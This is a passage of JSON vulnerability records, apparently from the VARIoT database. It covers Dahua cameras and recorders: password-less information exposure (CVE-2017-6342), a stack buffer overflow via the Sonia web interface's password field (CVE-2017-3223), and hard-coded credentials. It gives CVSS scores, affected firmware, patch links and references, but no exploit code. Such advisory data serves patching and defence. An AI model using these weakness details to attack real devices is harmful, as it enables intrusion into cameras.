          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT",
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-02590"
          }
        ]
      },
      "last_update_date": "2023-12-18T12:44:41.681000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "HCVR7204/7208/7216A-S3",
            "trust": 0.8,
            "url": "http://www1.dahuasecurity.com/th/products/hcvr720472087216a-s3-1434.html"
          },
          {
            "title": "Dahua DHI-HCVR7216A-S3 Security vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=99658"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002229"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-919"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-269",
            "trust": 1.1
          },
          {
            "problemtype": "CWE-284",
            "trust": 0.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-114545"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002229"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6342"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.1,
            "url": "https://nullku7.github.io/stuff/exposure/dahua/2017/02/24/dahua-nvr.html"
          },
          {
            "trust": 2.3,
            "url": "http://www.securityfocus.com/bid/96454"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-6342"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2017-6342"
          },
          {
            "trust": 0.3,
            "url": "http://www.dahuasecurity.com/products_category/dvr-2.html"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-02590"
          },
          {
            "db": "VULHUB",
            "id": "VHN-114545"
          },
          {
            "db": "BID",
            "id": "96454"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002229"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6342"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-919"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-02590"
          },
          {
            "db": "VULHUB",
            "id": "VHN-114545"
          },
          {
            "db": "BID",
            "id": "96454"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002229"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-6342"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-919"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-03-10T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-02590"
          },
          {
            "date": "2017-02-27T00:00:00",
            "db": "VULHUB",
            "id": "VHN-114545"
          },
          {
            "date": "2017-02-27T00:00:00",
            "db": "BID",
            "id": "96454"
          },
          {
            "date": "2017-04-05T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-002229"
          },
          {
            "date": "2017-02-27T07:59:00.410000",
            "db": "NVD",
            "id": "CVE-2017-6342"
          },
          {
            "date": "2017-02-28T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201702-919"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-03-10T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-02590"
          },
          {
            "date": "2019-10-03T00:00:00",
            "db": "VULHUB",
            "id": "VHN-114545"
          },
          {
            "date": "2017-03-07T01:08:00",
            "db": "BID",
            "id": "96454"
          },
          {
            "date": "2017-04-05T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-002229"
          },
          {
            "date": "2019-10-03T00:03:26.223000",
            "db": "NVD",
            "id": "CVE-2017-6342"
          },
          {
            "date": "2019-10-23T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201702-919"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-919"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Dahua DHI-HCVR7216A-S3 Vulnerability to view important information without password information on the device",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-002229"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "lack of information",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201702-919"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201807-0267

    Vulnerability from variot - Updated: 2023-12-18 12:36

    Dahua IP camera products using firmware versions prior to V2.400.0000.14.R.20170713 include a version of the Sonia web interface that may be vulnerable to a stack buffer overflow. Dahua IP camera products include an application known as Sonia (/usr/bin/sonia) that provides the web interface and other services for controlling the IP camera remotely. Versions of Sonia included in firmware versions prior to DH_IPC-Consumer-Zi-Themis_Eng_P_V2.408.0000.11.R.20170621 do not validate input data length for the 'password' field of the web interface. A remote, unauthenticated attacker may submit a crafted POST request to the IP camera's Sonia web interface that may lead to out-of-bounds memory operations and loss of availability or remote code execution. The issue was originally identified by the researcher in firmware version DH_IPC-HX1X2X-Themis_EngSpnFrn_N_V2.400.0000.30.R.20160803. Crafted, sent from a remote third party POST Processing the request can cause a stack-based buffer overflow. The problem is the firmware DH_IPC-HX1X2X-Themis_EngSpnFrn_N_V2.400.0000.30.R.20160803 First identified.Crafted, sent by a remote third party POST Service disruption by processing requests (DoS) An attack may be performed or arbitrary code may be executed on the product. DahuaIPCamera is a webcam from Dahua, China. DahuaIPCamera has a stack buffer overflow vulnerability. An attacker could exploit the vulnerability to execute arbitrary code or cause a denial of service in the context of an affected application. Failed exploit attempts will likely cause a denial-of-service condition

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201807-0267",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "ip camera",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "dh_ipc-ack-themis_eng_p_v2.400.0000.14.r.20170713.bin"
          },
          {
            "model": "ip camera",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "dahuasecurity",
            "version": "2.400.0000.14.r.20170713"
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua security",
            "version": null
          },
          {
            "model": "ip camera",
            "scope": null,
            "trust": 0.8,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "security dahua ip camera 2.400.0000.14.r.2017",
            "scope": null,
            "trust": 0.6,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "security ip camera 2.400.0000.14.r.2017",
            "scope": null,
            "trust": 0.3,
            "vendor": "dahua",
            "version": null
          },
          {
            "model": "security ip camera 2.400.0000.14.r.2017",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "dahua",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#547255"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-27850"
          },
          {
            "db": "BID",
            "id": "99620"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005172"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-3223"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ip_camera_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "dh_ipc-ack-themis_eng_p_v2.400.0000.14.r.20170713.bin",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ip_camera:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ip_camera_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "2.400.0000.14.r.20170713",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ip_camera:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-3223"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Ilya Smith and Yury Maryshev.",
        "sources": [
          {
            "db": "BID",
            "id": "99620"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-1180"
          }
        ],
        "trust": 0.9
      },
      "cve": "CVE-2017-3223",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "HIGH",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "COMPLETE",
                "availabilityRequirement": "NOT DEFINED",
                "baseScore": 10.0,
                "collateralDamagePotential": "NOT DEFINED",
                "confidentialityImpact": "COMPLETE",
                "confidentialityRequirement": "NOT DEFINED",
                "enviromentalScore": 5.9,
                "exploitability": "PROOF-OF-CONCEPT",
                "exploitabilityScore": 10.0,
                "id": "CVE-2017-3223",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "integrityRequirement": "NOT DEFINED",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "remediationLevel": "OFFICIAL FIX",
                "reportConfidence": "CONFIRMED",
                "severity": "HIGH",
                "targetDistribution": "MEDIUM",
                "trust": 0.8,
                "userInterationRequired": null,
                "vector_string": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "IPA",
                "availabilityImpact": "Complete",
                "baseScore": 10.0,
                "confidentialityImpact": "Complete",
                "exploitabilityScore": null,
                "id": "JVNDB-2017-005172",
                "impactScore": null,
                "integrityImpact": "Complete",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2017-27850",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "IPA",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2017-005172",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2017-3223",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2017-3223",
                "trust": 0.8,
                "value": "HIGH"
              },
              {
                "author": "IPA",
                "id": "JVNDB-2017-005172",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2017-27850",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201707-1180",
                "trust": 0.6,
                "value": "CRITICAL"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#547255"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-27850"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005172"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-3223"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-1180"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Dahua IP camera products using firmware versions prior to V2.400.0000.14.R.20170713 include a version of the Sonia web interface that may be vulnerable to a stack buffer overflow. Dahua IP camera products include an application known as Sonia (/usr/bin/sonia) that provides the web interface and other services for controlling the IP camera remotely. Versions of Sonia included in firmware versions prior to DH_IPC-Consumer-Zi-Themis_Eng_P_V2.408.0000.11.R.20170621 do not validate input data length for the \u0027password\u0027 field of the web interface. A remote, unauthenticated attacker may submit a crafted POST request to the IP camera\u0027s Sonia web interface that may lead to out-of-bounds memory operations and loss of availability or remote code execution. The issue was originally identified by the researcher in firmware version DH_IPC-HX1X2X-Themis_EngSpnFrn_N_V2.400.0000.30.R.20160803. Crafted, sent from a remote third party POST Processing the request can cause a stack-based buffer overflow. The problem is the firmware DH_IPC-HX1X2X-Themis_EngSpnFrn_N_V2.400.0000.30.R.20160803 First identified.Crafted, sent by a remote third party POST Service disruption by processing requests (DoS) An attack may be performed or arbitrary code may be executed on the product. DahuaIPCamera is a webcam from Dahua, China. DahuaIPCamera has a stack buffer overflow vulnerability. An attacker could exploit the vulnerability to execute arbitrary code or cause a denial of service in the context of an affected application. Failed exploit attempts will  likely cause a denial-of-service condition",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-3223"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547255"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005172"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-27850"
          },
          {
            "db": "BID",
            "id": "99620"
          }
        ],
        "trust": 3.15
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2017-3223",
            "trust": 4.1
          },
          {
            "db": "CERT/CC",
            "id": "VU#547255",
            "trust": 4.1
          },
          {
            "db": "BID",
            "id": "99620",
            "trust": 2.5
          },
          {
            "db": "JVN",
            "id": "JVNVU97102517",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005172",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-27850",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-1180",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#547255"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-27850"
          },
          {
            "db": "BID",
            "id": "99620"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005172"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-3223"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-1180"
          }
        ]
      },
      "id": "VAR-201807-0267",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-27850"
          }
        ],
        "trust": 1.3857143
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-27850"
          }
        ]
      },
      "last_update_date": "2023-12-18T12:36:43.305000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Download Center Firmware IPC",
            "trust": 0.8,
            "url": "http://www.dahuasecurity.com/firmware_161.html"
          },
          {
            "title": "DahuaIPcamera Stack Buffer Overflow Vulnerability Patch",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchinfo/show/102594"
          },
          {
            "title": "Dahua IP camera Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=72025"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-27850"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005172"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-1180"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-119",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-121",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005172"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-3223"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.3,
            "url": "https://www.kb.cert.org/vuls/id/547255"
          },
          {
            "trust": 1.9,
            "url": "http://www.dahuasecurity.com/firmware_161.html"
          },
          {
            "trust": 1.6,
            "url": "http://www.securityfocus.com/bid/99620"
          },
          {
            "trust": 0.8,
            "url": "http://cwe.mitre.org/data/definitions/121.html"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-3223"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/vu/jvnvu97102517/"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2017-3223"
          },
          {
            "trust": 0.3,
            "url": "http://www.dahuasecurity.com/"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#547255"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-27850"
          },
          {
            "db": "BID",
            "id": "99620"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005172"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-3223"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-1180"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#547255"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-27850"
          },
          {
            "db": "BID",
            "id": "99620"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-005172"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-3223"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-1180"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-07-18T00:00:00",
            "db": "CERT/CC",
            "id": "VU#547255"
          },
          {
            "date": "2017-09-21T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-27850"
          },
          {
            "date": "2017-07-18T00:00:00",
            "db": "BID",
            "id": "99620"
          },
          {
            "date": "2017-07-20T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-005172"
          },
          {
            "date": "2018-07-24T15:29:00.843000",
            "db": "NVD",
            "id": "CVE-2017-3223"
          },
          {
            "date": "2017-07-28T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201707-1180"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2017-07-26T00:00:00",
            "db": "CERT/CC",
            "id": "VU#547255"
          },
          {
            "date": "2019-05-17T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-27850"
          },
          {
            "date": "2017-07-18T00:00:00",
            "db": "BID",
            "id": "99620"
          },
          {
            "date": "2019-07-24T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-005172"
          },
          {
            "date": "2019-10-09T23:27:24.947000",
            "db": "NVD",
            "id": "CVE-2017-3223"
          },
          {
            "date": "2019-10-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201707-1180"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-1180"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Dahua IP cameras Sonia web interface is vulnerable to stack buffer overflow",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#547255"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201707-1180"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201705-3744

    Vulnerability from variot - Updated: 2023-12-18 12:29

    plural Dahua The product contains a vulnerability related to the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Dahua Technology Authentication is an access control reader produced by Dahua Technology. Dahua Technology Authentication has an authentication vulnerability. An attacker could exploit the vulnerability to gain unauthorized access to restricted content by bypassing expected security restrictions. Dahua DH-IPC-HDBW23A0RN-ZS, etc. are all camera products of Dahua Company in China. A security vulnerability exists in several Dahua products due to the program's use of password hashes instead of passwords to perform authentication. The following products are affected: Dahua DH-IPC-HDBW23A0RN-ZS; DH-IPC-HDBW13A0SN; DH-IPC-HDW1XXX; DH-IPC-HDW2XXX; DH-IPC-HDW4XXX; DH-IPC-HFW4XXX; DH-SD6CXX; DH-NVR1XXX; DH-HCVR4XXX; DH-HCVR5XXX; DHI-HCVR51A04HE-S3; DHI-HCVR51A08HE-S3;

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
